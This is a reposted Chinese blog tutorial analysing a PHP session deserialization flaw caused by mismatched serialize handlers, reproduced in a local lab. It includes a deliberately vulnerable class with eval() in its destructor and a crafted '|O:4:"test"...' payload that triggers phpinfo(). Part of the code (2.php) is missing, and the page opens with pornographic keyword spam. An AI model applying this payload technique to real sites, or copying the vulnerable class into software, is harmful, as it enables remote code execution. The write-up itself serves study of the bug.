日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php session 反序列化,PHP SESSION反序列化本地样例分析

發布時間:2025/3/12 php 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php session 反序列化,PHP SESSION反序列化本地样例分析 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PHP SESSION反序列化本地樣例分析

0X00漏洞原因

主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);

ini_set(‘session.serialize_handler’, ‘php’);

兩者處理session的方式不同。

0X01漏洞分析

如果在PHP在反序列化存儲的$_SESSION數據時使用的引擎和序列化使用的引擎不一樣,會導致數據無法正確第反序列化。通過精心構造的數據包,就可以繞過程序的驗證或者是執行一些系統的方法

0X02漏洞環境

Windows10

Phpstudy一件集成環境

0X03漏洞復現

首先現在本地phpstudy網站根目錄新建倆個測試用例1.php和2.php

內容分別為

1.php:

ini_set('session.serialize_handler', 'php');

session_start();classtest {var$hi;

function __construct(){

$this->hi = 'phpinfo();';

}

function __destruct() {

eval($this->hi);

}

}?>

2.php:

漏洞利用

首先構造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

可以看到2.php中接收的參數為a

提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

也就是訪問127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

訪問后結果如下:

然后再訪問http://127.0.0.1/test1.php,成功執行phpinfo()

0X04漏洞分析

提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;},

傳入的數據會按照php_serialize來進行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

此時訪問1.php,應用程序會按照php來反序列化SESSION中的數據,此時就會反序列化偽造的數據,php引擎會以|作為作為key和value的分隔符,那么就會將a:1:{s:4:"test";s:43:"作為SESSION的key,將O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作為value,然后進行反序列化,最后就會就會實例化test對象,最后就會執行析構函數中的eval()方法。

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的php session 反序列化,PHP SESSION反序列化本地样例分析的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。